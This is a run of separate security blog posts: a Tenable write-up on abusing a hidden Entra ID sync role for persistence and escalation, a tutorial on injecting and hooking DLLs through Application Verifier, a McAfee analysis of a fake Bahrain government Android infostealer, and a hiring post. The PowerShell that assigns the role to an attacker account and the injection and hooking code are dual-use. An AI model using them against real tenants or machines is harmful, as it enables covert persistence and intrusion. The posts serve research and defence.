This was discovered by Tenable Research while working on identity security.

“Directory Synchronization Accounts” role

Permissions inside Microsoft Entra ID (e.g. reset user password, change group membership, create applications, etc.) are granted through Entra roles. This article focuses on the Directory Synchronization Accounts role among the around 100 built-in Entra roles. This role has the ID “d29b2b05–8046–44ba-8758–1e26182fcf32”, it has the PRIVILEGED label that was recently introduced, and its description is:

This is a privileged role. Do not use. This role is automatically assigned to the Microsoft Entra Connect service, and is not intended or supported for any other use.

A privileged role that one should not use? It sounds like an invitation to me! 😉

The documentation seems to say that this special role cannot be freely assigned:

This special built-in role can’t be granted outside of the Microsoft Entra Connect wizard

This is incorrect since it can be assigned technically, even if it shouldn’t be (pull-request to fix this).

Privileged role

I confirm that the role is privileged because, of course, it contains some permissions marked as privileged, but also because it has implicit permissions in the private undocumented “Azure AD Synchronization” API (not to be confused with the public “Microsoft Entra Synchronization” API).

These permissions allow escalation up to the Global Administrator role using several methods that we will see later💥

Normal usage by Microsoft Entra Connect

The normal usage of this role is indeed to be assigned to the Entra service account used by “Entra Connect” (formerly “Azure AD Connect”), i.e. the user named “On-Premises Directory Synchronization Service Account” which has a UPN with this syntax: “SYNC_<name of the on-prem server where Entra Connect runs>_<random id>@tenant.example.net”.

Even though it is not documented (I’ve proposed a pull-request to fix this), this role is also assigned to the similar Entra service account used by “Entra Cloud Sync” (formerly “Azure AD Connect Cloud Sync”), i.e. the user also named “On-Premises Directory Synchronization Service Account” but which has a UPN with this syntax: “[email protected]” instead.

This role grants to the Entra service user, the permissions it requires to perform its inter-directory provisioning duties, such as creating/updating hybrid Entra users from the on-premises AD users, updating their password in Entra when it changes in AD with Password Hash Sync enabled, etc.

Security defaults

Security defaults is a feature in Entra ID allowing to activate multiple security features at once to increase security, notably requiring Multi-Factor Authentication (MFA). However, as documented by Microsoft and highlighted by Dr. Nestori Syynimaa @DrAzureAD, the “Directory Synchronization Accounts” role assignees are excluded from security defaults!

Dr. Nestori Syynimaa on Twitter: "Pro tip for threat actors:Create your persistent account as directory synchronization account. It has nice permissions and excluded from security defaults 🥷Pro tip for admins:Purchase Azure AD premium and block all users with that role (excluding the real sync account) 🔥 https://t.co/tm7YZtSdQv pic.twitter.com/RUnvILwucE / Twitter"

Pro tip for threat actors:Create your persistent account as directory synchronization account. It has nice permissions and excluded from security defaults 🥷Pro tip for admins:Purchase Azure AD premium and block all users with that role (excluding the real sync account) 🔥 https://t.co/tm7YZtSdQv pic.twitter.com/RUnvILwucE

Nestori also confirmed that the limitation concerns all those assigned to the role (I’ve proposed a pull-request to update the doc).

Once again, I understand the need for this since the legitimate accounts are user accounts, thus subject to MFA rules. However, this could be abused by a malicious administrator who wants to avoid MFA 😉

Hidden role

Here is the proof that this role is hidden in the Azure portal / Entra admin center. See this Entra Connect service account apparently having 1 role assigned:

But no results are shown in the “Assigned roles” menu (same in the other tabs, e.g. “Eligible assignments”) 🤔:

Actually I tested it in several of my tenants and I noticed that the role was displayed in another tenant:

I suppose that the portal is running a different version of the code, or due to a feature-flag or A/B testing, because this one uses the MS Graph API (on graph.microsoft.com) to list the role assignments:

Whereas the other uses a private API (on api.azrbac.mspim.azure.com):

I noticed this difference last year when I initially reported this behavior to MSRC.

And what about the “Roles and administrators” menu? We should be able to see the “Directory Synchronization Accounts” built-in role, isn’t it? Well, as you guessed, it’s hidden too 🙈 (in all my tenants: no difference here):

Note that for those that prefer it, the observations are identical in the Entra admin center.

I understand that Microsoft decided to hide it since this is a technical role that isn’t meant to be assigned by customers. A handful of other similar roles are hidden too. However, from a security perspective, I find it dangerous because organizations cannot use the Microsoft portals to see who may have this privileged role assigned illegitimately 😨! I reported this concern to MSRC (reference VULN-083495) last year, who confirmed that it was not a security issue and that they created a feature request to eventually improve the UX to help customers understand it.

This is the reason why I consider that this privileged role is a stealthy persistence method for attackers who compromised an Entra tenant.

Abuse methods

We will see how the security principals (users, but also service principals!) assigned to the “Directory Synchronization Accounts” role can elevate their privileges to the Global Administrator role! 😎

Password reset

There are several articles online explaining that the Entra Connect (ex- Azure AD Connect) service account in Entra ID is allowed to reset user passwords. One example is the “Unnoticed sidekick: Getting access to cloud as an on-prem admin” article by Dr. Nestori Syynimaa where “Set-AADIntUserPassword” is used.

I suppose this is allowed by the “microsoft.directory/passwordHashSync/allProperties/allTasks” Entra permission of the role, but I cannot check for sure.

There are some limitations though:

  • Only hybrid accounts (synchronized from on-premises AD) can be targeted (which was only recently fixed)
  • Only if Password-Hash Sync (PHS) is enabled, but the role allows to enable it
  • Only via the private “Azure AD Synchronization” API, that is implemented in AADInternals, whose endpoint is https://adminwebservice.microsoftonline.com/provisioningservice.svc and it must not be confused with other similarly named APIs: the public Microsoft Entra Synchronization API, or the private Azure AD Provisioning API. So, the reset must be done using the Set-AADIntUserPassword AADInternals PowerShell cmdlet.
  • Not exploitable if the target has MFA or FIDO2 authentication enforced since the password can still be reset but authentication won’t be possible

Add credentials to privileged application / service principal

The other interesting method was described by Fabian Bader in this article: “From on-prem to Global Admin without password reset”. I recommend that you read the original article, but in a summary, the idea is to identify an application or service principal having powerful Microsoft Graph API permissions, then abuse the “microsoft.directory/applications/credentials/update” or “microsoft.directory/servicePrincipals/credentials/update” Entra permissions, which the “Directory Synchronization Accounts” role holds, to add credentials to it. Thus allowing to authenticate as the service principal, and abuse the appropriate method corresponding to the dangerous Graph API permission to escalate to Global Admin.

This method was also described by Dirk-jan Mollema in this article: “Azure AD privilege escalation — Taking over default application permissions as Application Admin“.

Manage role assignment

Since one cannot manage this role using Azure portal nor Entra admin center, how to list or manage its assignees? We will see how, using the Microsoft Graph PowerShell SDK since the Azure AD PowerShell module is now deprecated.

List role assignees

The Get-MgDirectoryRoleMember command allows to list the security principals assigned to a role. We reference the “Directory Synchronization Accounts” role by its well-known ID (as seen in the beginning) instead of its name for better reliability:

Connect-MgGraph -Scopes "Domain.Read.All"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Get-MgDirectoryRoleMember -DirectoryRoleId $dirSync.Id | Format-List *

The output is not very consistent because role assignees are “security principals” which can be either users, groups, or service principals (undocumented 😉), so different types of objects.

In this example I have specified the “Domain.Read.All” Graph API permission when connecting, because it is usually already delegated, but the least privileged permission is actually “RoleManagement.Read.Directory”.

Add role assignment

And how an attacker wishing to abuse this role for stealthy persistence would assign it? With the New-MgRoleManagementDirectoryRoleAssignment command:

Connect-MgGraph -Scopes "RoleManagement.ReadWrite.Directory"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
$hacker = Get-MgUser -UserId [email protected]
New-MgRoleManagementDirectoryRoleAssignment -RoleDefinitionId $dirSync.Id -PrincipalId $hacker.Id -DirectoryScopeId "/"

In this example, I have specified the “RoleManagement.ReadWrite.Directory” Graph API permission when connecting, which is the least privileged permission.

Also, if this role has never been used in the tenant (for example if Entra Connect / Entra Cloud Sync was never configured), the role instance must be created from the role template before usage, with this command:

New-MgDirectoryRole -RoleTemplateId "d29b2b05-8046-44ba-8758-1e26182fcf32"

Remove role assignment

A malicious role assignment, or one which is a leftover from when the Entra tenant was hybrid, can be removed with the Remove-MgDirectoryRoleMemberByRef command:

$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Remove-MgDirectoryRoleMemberByRef -DirectoryRoleId $dirSync.Id -DirectoryObjectId <object ID of the assignee to remove>

Recommendations

➡️ As a conclusion, my recommendation is to list and monitor the security principals assigned to the “Directory Synchronization Accounts” role. Since you cannot use the Azure portal / Entra admin center to see those, you must use the Graph API (or the deprecated Azure AD PowerShell module) as described above. Thankfully, you will soon be able list all role assignees from the comfort of Tenable One or Tenable Identity Exposure.

🕵️ Any unrecognized suspicious assignee must be investigated because it may be a potential backdoor. Does it look like a legitimate Entra Connect or Entra Cloud Sync service user? Does its creation date correspond to the set up date of hybrid synchronization? Etc. Tenable Identity Exposure will soon add an Indicator of Exposure (IoE) allowing automatic identification of those suspicious “Directory Synchronization Accounts” role assignments, including more detailed recommendations.

🛡️ As a safety net, you can also follow Dr. Nestori Syynimaa’s recommendation to create a Conditional Access policy to block all users with that role, except the real legitimate synchronization user.

🤞 Finally, I hope that Microsoft will soon find a solution, with a better user experience, allowing to discourage the usage of the “Directory Synchronization Accounts” role, without resorting to hiding it, so customers can use the Azure portal or Entra admin center to see the role and its assignees.


Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Building a Verifier DLL

The Application Verifier tool that is part of the Windows SDK provide a way to analyze processes for various types of misbehavior. The GUI provided looks like the following:

Application Verifier application window

To add an application, you can browse your file system and select an executable. The Application Verifier settings are based around the executable name only – not a full path. This is because verifier settings are stored in a subkey under Image File Execution Options with the name of the executable. For the notepad example above, you’ll find the following in the Registry:

Key for notepad.exe under the IFEO subkey

This IFEO subkey is used for NT Global Flags settings, one of which is using the Application Verifier. The GlobalFlag value is shown to be 0x100, which is the bit used for the verifier. Another way to set it without any extra information is using the GFlags tool, part of the Debugging Tools for Windows package:

GFlags tool

The Application Verifier lists a bunch of DLLs under the VerifierDLLs value. Each one must be located in the system directory (e.g., c:\Windows\System32). Full paths are not supported; this is intentional, because the list of DLLs are going to be loaded to any process running the specified executable, and it would be risky to load DLLs from arbitrary locations in the file system. The system directory, as well as the IFEO key are normally write-accessible by administrators only.

The list of verifier DLLs is selected based on the set of tests selected by the user on the right hand side of the GUI. You’ll find subkeys that are used by the system-provided verifier DLLs with more settings related to the tests selected.

The nice thing about any verifier DLL specified, is that these DLLs are loaded early in the process lifetime, by verifier.dll (in itself loaded by NTDLL.dll), before any other DLLs are loaded into the process. Even attaching a debugger to the process while launching it would “miss” the loading of these DLLs.

This behavior makes this technique attractive for injecting a DLL into arbitrary processes. It’s even possible to enable Application Verifier globally and even dynamically (without the need to restart the system), so that these DLLs are injected into all processes (except protected processes).

Writing a Verifier DLL

Application Verifier tests descriptions is not the focus of this post. Rather, we’ll look into what it takes to create such a DLL that can be injected early and automatically into processes of our choice. As we’ll see, it’s not just about mere injection. The verifier infrastructure (part of verifier.dll) provides convenient facilities to hook functions.

If we create a standard DLL, set up the verifier entries while adding our DLL to the list of verifier DLLs (possibly removing the “standard” ones), and try to run our target executable (say, notepad), we get the following nasty message box:

The process shuts down, which means that if a verifier DLL fails to be properly processed, the process terminates rather than “skipping” the DLL.

Launching notepad with WinDbg spits the following output:

ModLoad: 00007ff7`6dfa0000 00007ff7`6dfd8000   notepad.exe
ModLoad: 00007ffd`978f0000 00007ffd`97ae8000   ntdll.dll
ModLoad: 00007ffd`1f650000 00007ffd`1f6c4000   C:\Windows\System32\verifier.dll
Page heap: pid 0x10CEC: page heap enabled with flags 0x3.
AVRF: notepad.exe: pid 0x10CEC: flags 0x81643027: application verifier enabled
ModLoad: 00007ffc`cabd0000 00007ffc`cad6f000   C:\Windows\SYSTEM32\MyVerify.dll
ModLoad: 00007ffd`97650000 00007ffd`9770d000   C:\Windows\System32\KERNEL32.dll
ModLoad: 00007ffd`951b0000 00007ffd`954a6000   C:\Windows\System32\KERNELBASE.dll
AVRF: provider MyVerify.dll did not initialize correctly

Clearly the DLL did not initialize correctly, which is what the NTSTATUS 0xc0000142 was trying to tell us in the message box.

DLLs are initialized with the DllMain function that typically looks like this:

BOOL WINAPI DllMain(HMODULE hModule, DWORD reason, PVOID lpReserved) {
	switch (reason) {
		case DLL_PROCESS_ATTACH:
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
	}
	return TRUE;
}

The classic four values shown are used by the DLL to run code when it’s loaded into a process (DLL_PROCESS_ATTACH), unloaded from a process (DLL_PROCESS_DETACH), a thread is created in the process (DLL_THREAD_ATTACH), and thread is exiting in the process (DLL_THREAD_DETACH). It turns out that there is a fifth value, which must be used with verifiier DLLs:

#define DLL_PROCESS_VERIFIER 4

Returning TRUE from such a case is not nearly enough. Instead, a structure expected by the caller of DllMain must be initialized and its address provided in lpReserved. The following structures and callback type definitions are needed:

typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR {
	PCHAR ThunkName;
	PVOID ThunkOldAddress;
	PVOID ThunkNewAddress;
} RTL_VERIFIER_THUNK_DESCRIPTOR, *PRTL_VERIFIER_THUNK_DESCRIPTOR;

typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR {
	PWCHAR DllName;
	ULONG DllFlags;
	PVOID DllAddress;
	PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks;
} RTL_VERIFIER_DLL_DESCRIPTOR, *PRTL_VERIFIER_DLL_DESCRIPTOR;

typedef void (NTAPI* RTL_VERIFIER_DLL_LOAD_CALLBACK) (
	PWSTR DllName,
	PVOID DllBase,
	SIZE_T DllSize,
	PVOID Reserved);
typedef void (NTAPI* RTL_VERIFIER_DLL_UNLOAD_CALLBACK) (
	PWSTR DllName,
	PVOID DllBase,
	SIZE_T DllSize,
	PVOID Reserved);
typedef void (NTAPI* RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK) (
	PVOID AllocationBase,
	SIZE_T AllocationSize);

typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR {
	ULONG Length;
	PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls;
	RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback;
	RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback;

	PWSTR VerifierImage;
	ULONG VerifierFlags;
	ULONG VerifierDebug;

	PVOID RtlpGetStackTraceAddress;
	PVOID RtlpDebugPageHeapCreate;
	PVOID RtlpDebugPageHeapDestroy;

	RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;
} RTL_VERIFIER_PROVIDER_DESCRIPTOR;

That’s quite a list. The main structure is RTL_VERIFIER_PROVIDER_DESCRIPTOR
that has a pointer to an array of RTL_VERIFIER_DLL_DESCRIPTOR
(the last element in the array must end with all zeros), which in itself points to an array of RTL_VERIFIER_THUNK_DESCRIPTOR
, used for specifying functions to hook. There are a few callbacks as well. At a minimum, we can define this descriptor like so (no hooking, no special code in callbacks):

RTL_VERIFIER_DLL_DESCRIPTOR noHooks{};

RTL_VERIFIER_PROVIDER_DESCRIPTOR desc = {
	sizeof(desc),
	&noHooks,
	[](auto, auto, auto, auto) {},
	[](auto, auto, auto, auto) {},
	nullptr, 0, 0,
	nullptr, nullptr, nullptr,
	[](auto, auto) {},
};

We can define these simply as global variables and return the address of desc in the handling of DLL_PROCESS_VERIFIER:

case DLL_PROCESS_VERIFIER:
	*(PVOID*)lpReserved = &desc;
	break;

With this code in place, we can try launching notepad again (after copying MyVerify.Dll to the System32 directory). Here is the output from WinDbg:

ModLoad: 00007ff7`6dfa0000 00007ff7`6dfd8000   notepad.exe
ModLoad: 00007ffd`978f0000 00007ffd`97ae8000   ntdll.dll
ModLoad: 00007ffd`1f650000 00007ffd`1f6c4000   C:\Windows\System32\verifier.dll
Page heap: pid 0xB30C: page heap enabled with flags 0x3.
AVRF: notepad.exe: pid 0xB30C: flags 0x81643027: application verifier enabled
ModLoad: 00007ffd`25b50000 00007ffd`25cf1000   C:\Windows\SYSTEM32\MyVerify.dll
ModLoad: 00007ffd`97650000 00007ffd`9770d000   C:\Windows\System32\KERNEL32.dll
ModLoad: 00007ffd`951b0000 00007ffd`954a6000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`963e0000 00007ffd`9640b000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`95790000 00007ffd`957b2000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`95090000 00007ffd`951a7000   C:\Windows\System32\gdi32full.dll
...

This time it works. MyVerify.dll loads right after verifier.dll (which is the one managing verify DLLs).

Hooking Functions

As mentioned before, we can use the verifier engine’s support for hooking functions in arbitrary DLLs. Let’s give this a try by hooking into a couple of functions, GetMessage and CreateFile. First, we need to set up the structures for the hooks on a per-DLL basis:

RTL_VERIFIER_THUNK_DESCRIPTOR user32Hooks[] = {
	{ (PCHAR)"GetMessageW", nullptr, HookGetMessage },
	{ nullptr, nullptr, nullptr },
};

RTL_VERIFIER_THUNK_DESCRIPTOR kernelbaseHooks[] = {
	{ (PCHAR)"CreateFileW", nullptr, HookCreateFile },
	{ nullptr, nullptr, nullptr },
};

The second NULL in each triplet is where the original address of the hooked function is stored by the verifier engine. Now we fill the structure with the list of DLLs, pointing to the hook arrays:

RTL_VERIFIER_DLL_DESCRIPTOR dlls[] = {
	{ (PWCHAR)L"user32.dll", 0, nullptr, user32Hooks },
	{ (PWCHAR)L"kernelbase.dll", 0, nullptr, kernelbaseHooks },
	{ nullptr, 0, nullptr, nullptr },
};

Finally, we update the main structure with the dlls array:

RTL_VERIFIER_PROVIDER_DESCRIPTOR desc = {
	sizeof(desc),
	dlls,
	[](auto, auto, auto, auto) {},
	[](auto, auto, auto, auto) {},
	nullptr, 0, 0,
	nullptr, nullptr, nullptr,
	[](auto, auto) {},
};

The last thing is to actually implement the hooks:

BOOL WINAPI HookGetMessage(PMSG msg, HWND hWnd, UINT filterMin, UINT filterMax) {
	// get original function
	static const auto orgGetMessage = (decltype(::GetMessageW)*)user32Hooks[0].ThunkOldAddress;
	auto result = orgGetMessage(msg, hWnd, filterMin, filterMax);
	char text[128];
	sprintf_s(text, "Received message 0x%X for hWnd 0x%p\n", msg->message, msg->hwnd);
	OutputDebugStringA(text);
	return result;
}

HANDLE WINAPI HookCreateFile(PCWSTR path, DWORD access, DWORD share, LPSECURITY_ATTRIBUTES sa, DWORD cd, DWORD flags, HANDLE hTemplate) {
	// get original function
	static const auto orgCreateFile = (decltype(::CreateFileW)*)kernelbaseHooks[0].ThunkOldAddress;
	auto hFile = orgCreateFile(path, access, share, sa, cd, flags, hTemplate);
	char text[512];
	if (hFile == INVALID_HANDLE_VALUE)
		sprintf_s(text, "Failed to open file %ws (%u)\n", path, ::GetLastError());
	else
		sprintf_s(text, "Opened file %ws successfuly (0x%p)\n", path, hFile);

	OutputDebugStringA(text);
	return hFile;
}

The hooks just send some output with OutputDebugString. Here is an excerpt output when running notepad under a debugger:

ModLoad: 00007ff7`6dfa0000 00007ff7`6dfd8000   notepad.exe
ModLoad: 00007ffd`978f0000 00007ffd`97ae8000   ntdll.dll
ModLoad: 00007ffd`1f650000 00007ffd`1f6c4000   C:\Windows\System32\verifier.dll
Page heap: pid 0xEF18: page heap enabled with flags 0x3.
AVRF: notepad.exe: pid 0xEF18: flags 0x81643027: application verifier enabled
ModLoad: 00007ffd`25b80000 00007ffd`25d24000   C:\Windows\SYSTEM32\MyVerify.dll
ModLoad: 00007ffd`97650000 00007ffd`9770d000   C:\Windows\System32\KERNEL32.dll
ModLoad: 00007ffd`951b0000 00007ffd`954a6000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`963e0000 00007ffd`9640b000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`95790000 00007ffd`957b2000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`95090000 00007ffd`951a7000   C:\Windows\System32\gdi32full.dll
...
ModLoad: 00007ffd`964f0000 00007ffd`965bd000   C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffd`96d10000 00007ffd`96d65000   C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffd`965d0000 00007ffd`966e4000   C:\Windows\System32\MSCTF.dll
Opened file C:\Windows\Fonts\staticcache.dat successfuly (0x0000000000000164)
ModLoad: 00007ffd`7eac0000 00007ffd`7eb6c000   C:\Windows\System32\TextShaping.dll
ModLoad: 00007ffc`ed750000 00007ffc`ed82e000   C:\Windows\System32\efswrt.dll
ModLoad: 00007ffd`90880000 00007ffd`909d7000   C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ffd`8bf90000 00007ffd`8bfad000   C:\Windows\System32\MPR.dll
ModLoad: 00007ffd`8cae0000 00007ffd`8cce3000   C:\Windows\System32\twinapi.appcore.dll
Opened file C:\Windows\Registration\R000000000025.clb successfuly (0x00000000000001C4)
ModLoad: 00007ffd`823b0000 00007ffd`82416000   C:\Windows\System32\oleacc.dll
...
Received message 0x31F for hWnd 0x00000000001F1776
Received message 0xC17C for hWnd 0x00000000001F1776
Received message 0xF for hWnd 0x00000000001F1776
Received message 0xF for hWnd 0x00000000003010C0
Received message 0xF for hWnd 0x0000000000182E7A
Received message 0x113 for hWnd 0x00000000003319A8
...
ModLoad: 00007ffd`80e20000 00007ffd`80fd4000   C:\Windows\System32\WindowsCodecs.dll
ModLoad: 00007ffd`94ee0000 00007ffd`94f04000   C:\Windows\System32\profapi.dll
Opened file C:\Users\Pavel\AppData\Local\IconCache.db successfuly (0x0000000000000724)
ModLoad: 00007ffd`3e190000 00007ffd`3e1f6000   C:\Windows\System32\thumbcache.dll
Opened file C:\Users\Pavel\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db successfuly (0x0000000000000450)
Opened file C:\Users\Pavel\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db successfuly (0x000000000000065C)
ModLoad: 00007ffd`90280000 00007ffd`90321000   C:\Windows\SYSTEM32\policymanager.dll

This application verifier technique is an interesting one, and fairly easy to use. The full example can be found at https://github.com/zodiacon/VerifierDLL.

Happy verifying!

Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud

Authored by Dexter Shin

Many government agencies provide their services online for the convenience of their citizens. Also, if this service could be provided through a mobile app, it would be very convenient and accessible. But what happens when malware pretends to be these services?

McAfee Mobile Research Team found an InfoStealer Android malware pretending to be a government agency service in Bahrain. This malware pretends to be the official app of Bahrain and advertises that users can renew or apply for driver’s licenses, visas, and ID cards on mobile. Users who are deceived by advertisements that they are available on mobile will be provided with the necessary personal information for these services without a doubt. They reach users in various ways, including Facebook and SMS messages. Users who are not familiar with these attacks easily make the mistake of sending personal information.

Detailed pretended app

In Bahrain, there’s a government agency called the Labour Market Regulatory Authority (LMRA). This agency operates with full financial and administrative independence under the guidance of a board of directors chaired by the Minister of Labour. They provide a variety of mobile services, and most apps provide only one service per app. However, this fake app promotes providing more than one service.

Figure 1. Legitimate official LMRA website

Figure 2. Fake app named LMRA

Excluding the most frequently found fake apps pretending LMRA, there are various fake apps included Bank of Bahrain and Kuwait (BBK), BenefitPay, a fintech company in Bahrain, and even apps pretending to be related to Bitcoin or loans. These apps use the same techniques as the LMRA fake apps to steal personal information.

Figure 3. Various fake apps using the same techniques

From the type of app that this malware pretends, we can guess that the purpose is financial fraud to use the personal information it has stolen. Moreover, someone has been affected by this campaign as shown in the picture below.

Figure 4. Victims of financial fraud (Source: Reddit)

Distribution method

They distribute these apps using Facebook pages and SMS messages. Facebook pages are fake and malware author is constantly creating new pages. These pages direct users to phishing sites, either WordPress blog sites or custom sites designed to download apps.

Figure 5. Facebook profile and page with a link to the phishing site

Figure 6. One of the phishing sites designed to download app

In the case of SMS, social engineering messages are sent to trick users into clicking a link so that they feel the need to urgently confirm.

Figure 7. Phishing message using SMS (Source: Reddit)

What they want

When the user launches the app, the app shows a large legitimate icon for users to be mistaken. And it asks for the CPR and phone number. The CPR number is an exclusive 9-digit identifier given to each resident in Bahrain. There is a “Verify” button, but it is simply a button to send information to the C2 server. If users input their information, it goes directly to the next screen without verification. This step just stores the information for the next step.

Figure 8. The first screen (left) and next screen of a fake app (right)

There are various menus, but they are all linked to the same URL. The parameter value is the CPR and phone numbers input by the user on the first screen.

Figure 9. All menus are linked to the same URL

The last page asks for the user’s full name, email, and date of birth. After inputting everything and clicking the “Send” button, all information inputted so far will be sent to the malware author’s c2 server.

Figure 10. All data sent to C2 server

After sending, it shows a completion page to trick the user. It shows a message saying you will receive an email within 24 hours. But it is just a counter that decreases automatically. So, it does nothing after 24 hours. In other words, while users are waiting for the confirmation email for 24 hours, cybercriminals will exploit the stolen information to steal victims’ financial assets.

Figure 11. Completion page to trick users

In addition, they have a payload for stealing SMS. This app has a receiver that works when SMS is received. So as soon as SMS comes, it sends an SMS message to the C2 server without notifying the user.

Figure 12. Payload for stealing SMS

Dynamic loading of phishing sites via Firebase

We confirmed that there are two types of these apps. There is a type that implements a custom C2 server and receives data directly through web API, and another type is an app that uses Firebase. Firebase is a backend service platform provided by Google. Among many services, Firestore can store data as a database. This malware uses Firestore. Because it is a legitimate service provided by Google, it is difficult to detect as a malicious URL.

For apps that use Firebase, dynamically load phishing URLs stored in Firestore. Therefore, even if a phishing site is blocked, it is possible to respond quickly to maintain already installed victims by changing the URL stored in Firestore.

Figure 13. Dynamically loading phishing site loaded in webview

Conclusion

According to our detection telemetry data, there are 62 users have already used this app in Bahrain. However, since this data is a number at the time of writing, this number is expected to continue to increase, considering that new Facebook pages are still being actively created.

Recent malware tends to target specific countries or users rather than widespread attacks. These attacks may be difficult for general users to distinguish because malware accurately uses the parts needed by users living in a specific country. So we recommend users install secure software to protect their devices. Also, users are encouraged to download and use apps from official app stores like Google Play Store or Apple AppStore. If you can’t find an app in these stores, you must download the app provided on the official website.

McAfee Mobile Security already detects this threat as Android/InfoStealer. For more information, visit McAfee Mobile Security.

Indicators of Compromise (IOCs)

Samples:

SHA256 Package Name App Name
6f6d86e60814ad7c86949b7b5c212b83ab0c4da65f0a105693c48d9b5798136c com.ariashirazi.instabrowser LMRA
5574c98c9df202ec7799c3feb87c374310fa49a99838e68eb43f5c08ca08392d com.npra.bahrain.five LMRA Bahrain
b7424354c356561811e6af9d8f4f4e5b0bf6dfe8ad9d57f4c4e13b6c4eaccafb com.npra.bahrain.five LMRA Bahrain
f9bdeca0e2057b0e334c849ff918bdbe49abd1056a285fed1239c9948040496a com.lmra.nine.lmranine LMRA
bf22b5dfc369758b655dda8ae5d642c205bb192bbcc3a03ce654e6977e6df730 com.stich.inches Visa Update
8c8ffc01e6466a3e02a4842053aa872119adf8d48fd9acd686213e158a8377ba com.ariashirazi.instabrowser EasyLoan
164fafa8a48575973eee3a33ee9434ea07bd48e18aa360a979cc7fb16a0da819 com.ariashirazi.instabrowser BTC Flasher
94959b8c811fdcfae7c40778811a2fcc4c84fbdb8cde483abd1af9431fc84b44 com.ariashirazi.instabrowser BenefitPay
d4d0b7660e90be081979bfbc27bbf70d182ff1accd829300255cae0cb10fe546 com.lymors.lulumoney BBK Loan App

Domains:

  • https[://]lmraa.com
  • https[://]lmjbfv.site
  • https[://]dbjiud.site
  • https[://]a.jobshuntt.com
  • https[://]shop.wecarerelief.ca

Firebase(for C2):

  • https[://]npra-5.firebaseio.com
  • https[://]lmra9-38b17.firebaseio.com
  • https[://]practice-8e048.firebaseio.com

The post Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud appeared first on McAfee Blog.

Hacking the Future: 12 Years at Exodus and the Next Big Leap

Hacking the Future: 12 Years at Exodus and the Next Big Leap

Tl;dr – We are hiring engineers, analysts, and researchers.

This May marked our 12th year of producing world-class vulnerability intelligence at Exodus Intelligence. We have had many ups (and downs) and have worked with a variety of talented people over the years whose collective contributions have made us who we are today. Throughout our history we have stayed true to our founding mission of maintaining a hacking culture, made by hackers, for hackers. We challenge and pride ourselves on researching some of the hardest targets, across a diversity of platforms and operating systems. As a team we have analyzed (I’m’, talking weeks long, thorough, root cause analysis) more than 1,600 Nday, and discovered over 400 0day in enterprise products. Whether software, hardware, server side, client side, IoT… our experts have done it all.

It has been a bit of a waiting game for the industry to build an appreciation for vulnerability intelligence, let alone Zeroday vulnerability intelligence. I would argue that the industry is finally there, and with the help of a lot of the big companies, there are products that can effectively detect and defend against this category of risks.

There is still a degree of “wild west” in the industry where it is hard to design and maintain standards for reporting, tracking and cataloging vulnerabilities (CVE, CVSS, CNAs, CPEs, SBOM,…). At Exodus we have always focused on the core research as our wheelhouse and put less effort on the website, front end, and engineering work that drives how people view, search and ingest our data. The market demands it now.

We are at an inflection point and aim to make our data more widely available and develop what tools we can to aggregate, enrich and curate all the public data, marry it with our own discoveries and analysis, and distribute to our customers. We have developed integrations for Splunk, Demisto (Cortex XSOAR), Slack, Recorded Future, to name a few examples, but the engineering lift is large, and the research support is insurmountable. Even as we jump on the GenAI band wagon with everyone else and invest in LLM, ML and AI, that technology is only as good as its input/data, so our researchers will need to spend the requisite time and effort training these models.

Now to the point of this post, we are hiring. We are looking for engineers with a special motivation to understand these challenges and have a passion to build solutions that chip away at the problems. We intend to make some of this tooling, code, and data available to the public, so the engineers we bring onboard should have an appreciation for open source code. While we’re always looking for elite researchers to join the team, these engineering efforts will soon unlock the need for an army of analysts that are interested in coverage of public data an inch deep, and a mile wide. We will have the incentives and mentorship in place to refine and develop skills towards hacking  more difficult targets and research, but for the first time we will be opening our doors to entry level analysts with the motivation to learn and gain unparalleled experience in the world of vulnerability research.

Current openings include:

  • Full-Stack Software Engineer
  • Web Browser Vulnerability Researcher
  • Mobile Vulnerability Researcher
  • Zero-Day Vulnerability Researcher
  • N-Day Vulnerability Researcher

Please apply at our careers page

The post Hacking the Future: 12 Years at Exodus and the Next Big Leap appeared first on Exodus Intelligence.

Why AI Will Not Fully Replace Humans for Web Penetration Testing

Written by: Steven van der Baan

In the ever-evolving landscape of cybersecurity, the integration of artificial intelligence (AI) has revolutionized various aspects of threat detection, prevention, and mitigation. Web penetration testing, a crucial component of ensuring the security posture of digital assets, has seen significant advancements through AI-powered tools. While AI undoubtedly offers numerous benefits in this domain, it’s essential to recognize that it cannot entirely replace human expertise and intuition. In this article, we explore the reasons why AI will not fully replace humans for web penetration testing.

